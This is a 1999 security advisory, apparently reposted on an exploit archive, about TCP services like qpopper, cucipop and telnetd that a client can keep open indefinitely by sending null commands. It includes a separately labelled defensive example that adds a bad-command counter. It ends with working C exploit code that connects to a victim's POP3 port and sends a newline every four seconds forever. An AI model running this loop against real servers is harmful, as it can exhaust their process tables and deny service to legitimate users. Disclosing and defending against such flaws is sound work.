kki.inactive.connections.txt
Posted Aug 17, 1999

KKIS.28041999.002.b Security Advisory describes a common vulnerability with a wide variety of software applications that utilize tcp connections and do not properly close connections within a reasonable, secure time frame. Exploit code included to test for "inactive connection" vulnerabilities. KKI Security Team

tags | exploit, tcp, vulnerability
SHA-256 | 9a8c098e306bcc5628b1d35272ddab934481419144fdc4fcbe006f17c442fb4c

Date: Wed, 28 Apr 1999 13:59:28 +0200
From: Lukasz Luzar <lluzar@SECURITY.KKI.PL>
To: BUGTRAQ@netspace.org
Subject: KKIS.28041999.002.b

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

### ### ### ### ###
### ### ### ### ###
###### ###### ###
### ### ### ### ###
### ### ### ### ###

S E C U R I T Y

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Contacts ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
KKI Security Team                  Cracow Commercial Internet
http://www.security.kki.pl         http://www.kki.pl
mailto:security@security.kki.pl    mailto:biuro@kki.pl

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Information ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Report title        : Flaws in the implementation of mechanisms that
                      prevent clients from keeping parasitic connections
                      open in many TCP network services.
Problem found by    : Lukasz Luzar (lluzar@security.kki.pl)
Report created by   : Robert Pajak (shadow@security.kki.pl)
                      Lukasz Luzar (lluzar@security.kki.pl)
Report published    : 28 April 1999
Report code         : KKIS.28041999.002.b
Vulnerable programs : qpopper, in.pop3, cucipop, telnetd, ...
Systems affected    : Linux, FreeBSD, Solaris, ...
Archive             : http://www.security.kki.pl/advisories/
Risk level          : low

~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Description ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The designers of many popular network services try to build mechanisms
that prevent clients from keeping parasitic connections to their programs
open. The usual form of such protection is a timeout that closes inactive
connections.
Some of those designers forget, however, that a malicious client may
frequently send strings full of bad or null commands to the open port of
the service. Each such command counts as activity, so the timeout never
fires. This can happen before the connection has been authenticated with a
login and password.
Those programmers should implement an additional mechanism to prevent such
situations. A good solution is to keep a counter of bad (or null) commands
inside the program.

For example, a similar mechanism has been applied in sendmail. This
solution is effective and very easy to implement.

The lack of this mechanism may be quite threatening, because most of these
TCP services run with root privileges, and bounding the number of root
processes is not easy when the service has no internal bound of its own.
This affects the whole system when the process table is filled up, for
example by many open connections to the vulnerable TCP service.

The worst situation is when the vulnerable service does not log any
information about a connection before authentication with login/password.
One of the most vulnerable services in this respect is cucipop.
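The countermeasure the advisory recommends, shown as an added example that is not part of the KKI advisory: a pre-authentication command loop for a POP3-style service that combines the usual inactivity timeout with a counter of bad or empty commands. The limit of five bad commands, the list of accepted pre-authentication verbs and the pipe-based transcript helper are assumptions made for this example; a real service would call serve_preauth on the accepted socket.

```c
/* Added example, not code from the advisory: inactivity timeout plus a
 * bad-command counter for the pre-authentication phase of a service. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>
#include <unistd.h>
#include <sys/select.h>
#include <sys/time.h>

#define MAX_BAD_COMMANDS 5   /* assumed limit: drop after this many bad or empty commands */
#define MAX_LINE 512

enum verdict { KEEP_OPEN, DROP_BAD_LIMIT, DROP_IDLE, DROP_EOF, DROP_QUIT };

struct preauth_state {
    int bad_commands;   /* bad or empty commands seen before authentication */
};

/* Verbs a POP3-style service accepts before login succeeds (assumed list). */
static int is_known_preauth_command(const char *verb)
{
    static const char *known[] = { "USER", "PASS", "APOP", "CAPA", "QUIT", NULL };
    for (int i = 0; known[i] != NULL; i++)
        if (strcmp(verb, known[i]) == 0)
            return 1;
    return 0;
}

/* Classify one received line. Empty lines and unknown verbs count against
 * the client; when the counter reaches the limit the caller drops the connection. */
enum verdict preauth_handle_line(struct preauth_state *st, const char *line)
{
    char verb[16];
    size_t n = 0;

    while (*line == ' ' || *line == '\t')
        line++;
    while (*line != '\0' && *line != ' ' && *line != '\r' && *line != '\n'
           && n < sizeof verb - 1)
        verb[n++] = (char)toupper((unsigned char)*line++);
    verb[n] = '\0';

    if (n == 0 || !is_known_preauth_command(verb)) {
        if (++st->bad_commands >= MAX_BAD_COMMANDS)
            return DROP_BAD_LIMIT;
        return KEEP_OPEN;
    }
    if (strcmp(verb, "QUIT") == 0)
        return DROP_QUIT;
    return KEEP_OPEN;
}

/* Read one line from fd, giving up if no byte arrives within idle_sec seconds.
 * Returns 1 on a complete line, 0 on idle timeout, -1 on EOF or error. */
int read_line_with_timeout(int fd, char *buf, size_t len, int idle_sec)
{
    size_t n = 0;
    while (n + 1 < len) {
        fd_set rfds;
        struct timeval tv;
        char c;
        FD_ZERO(&rfds);
        FD_SET(fd, &rfds);
        tv.tv_sec = idle_sec;
        tv.tv_usec = 0;
        int r = select(fd + 1, &rfds, NULL, NULL, &tv);
        if (r == 0)
            return 0;               /* the inactivity timeout on its own */
        if (r < 0 || read(fd, &c, 1) <= 0)
            return -1;
        buf[n++] = c;
        if (c == '\n')
            break;
    }
    buf[n] = '\0';
    return 1;
}

/* Pre-authentication loop for one client descriptor: both defences together. */
enum verdict serve_preauth(int fd, int idle_sec)
{
    struct preauth_state st = { 0 };
    char line[MAX_LINE];

    for (;;) {
        int r = read_line_with_timeout(fd, line, sizeof line, idle_sec);
        if (r == 0)
            return DROP_IDLE;
        if (r < 0)
            return DROP_EOF;
        enum verdict v = preauth_handle_line(&st, line);
        if (v != KEEP_OPEN)
            return v;
    }
}

/* Helper: feed a constructed client transcript through a pipe. With hold_open
 * the writer stays open so the idle timeout, not EOF, ends the session. */
enum verdict run_transcript(const char *transcript, int hold_open, int idle_sec)
{
    int p[2];
    if (pipe(p) != 0)
        return DROP_EOF;
    if (write(p[1], transcript, strlen(transcript)) < 0)
        return DROP_EOF;
    if (!hold_open)
        close(p[1]);
    enum verdict v = serve_preauth(p[0], idle_sec);
    if (hold_open)
        close(p[1]);
    close(p[0]);
    return v;
}

int main(void)
{
    /* Constructed transcripts: the "\n" pattern from the advisory versus a real login. */
    printf("five empty lines -> %d (DROP_BAD_LIMIT=%d)\n",
           run_transcript("\n\n\n\n\n", 0, 5), DROP_BAD_LIMIT);
    printf("USER then silence -> %d (DROP_IDLE=%d)\n",
           run_transcript("USER alice\r\n", 1, 1), DROP_IDLE);
    return 0;
}
```

A client that sends a bare newline every few seconds never trips the timeout, but the counter ends the session after the fifth empty line; a client that goes quiet after a valid USER is dropped by the timeout. Because the verdict is returned rather than printed, the same function can also log the drop reason and the peer address before authentication, which addresses the advisory's complaint about services that log nothing before login.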

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Impact ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
The example below shows how to open and maintain a connection that may
stay open for an indefinite time.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~[ Example ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

--- CUT HERE ---
/*
 * example.c by Lukasz Luzar (lluzar@security.kki.pl)
 */

#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>        /* bzero */
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netinet/tcp.h>    /* TCP_NODELAY */
#include <arpa/inet.h>

/* victim's address and port of service */
#define ADDR "10.0.0.1"     // IP in dotted notation
#define PORT 110            // e.g. some pop3
#define DELAY 4             // (4 secs.) how often we are sending bad commands
#define COMMAND "\n"        // some bad (or null) command

int main(void)
{
    int sockfd, j, k;
    struct sockaddr_in victim_addr;

    bzero((char *) &victim_addr, sizeof(victim_addr));

    victim_addr.sin_family = AF_INET;
    victim_addr.sin_addr.s_addr = inet_addr(ADDR);
    victim_addr.sin_port = htons(PORT);

    if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        fprintf(stderr, "socket error\n");
        return 1;
    }

    if (connect(sockfd, (struct sockaddr *) &victim_addr,
                sizeof(victim_addr)) < 0) {
        fprintf(stderr, "connect error\n");
        return 1;
    }

    /* send each command immediately instead of letting the stack coalesce them */
    k = 1;
    if (setsockopt(sockfd, IPPROTO_TCP, TCP_NODELAY, &k, sizeof(k)) != 0)
        fprintf(stderr, "setsockopt error\n");

    j = strlen(COMMAND);

    /* keep the connection "active" forever by sending a null command every DELAY seconds */
    for (;;) {
        if (write(sockfd, COMMAND, j) == -1)
            fprintf(stderr, "write error\n");
        fprintf(stderr, ".");
        sleep(DELAY);
    }

    return 0;
}
--- CUT HERE ---

~~~~~~~~~~~~~~~~~~~~~~~~~[ Copyright statement ]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Copyright (c) 1999 KKI Security Team, Poland
All rights reserved.

All questions please address to mailto:security@security.kki.pl
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
